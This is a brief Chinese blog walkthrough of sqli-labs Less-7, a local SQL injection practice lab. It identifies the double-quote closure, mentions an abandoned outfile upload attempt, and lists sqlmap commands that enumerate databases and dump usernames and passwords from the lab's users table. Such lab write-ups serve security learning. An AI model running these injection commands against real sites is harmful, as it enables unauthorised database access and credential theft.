闭合类型
双引号,然后看到回显了一个use oufile,查了一下,好像是用sql语法进行文件上传。
用锤子,烦死了,上传了一万年,权限不够,又找不到那个提权的文件在哪。真醉了,直接给他sqlmap一把梭了。
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1""
首先就是可以查询他的注入情况。
看到可以通过布尔盲注和延时注入进行攻击
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1"" -dbs
爆库
爆表
列
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1%22" -D security -T users -C username -dump
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1%22" -D security -T users -C password -dump
爆字段
标签:sqlmap,0.1,py,sqli,master,less7,id From: https://www.cnblogs.com/xiaoxie11/p/17444302.html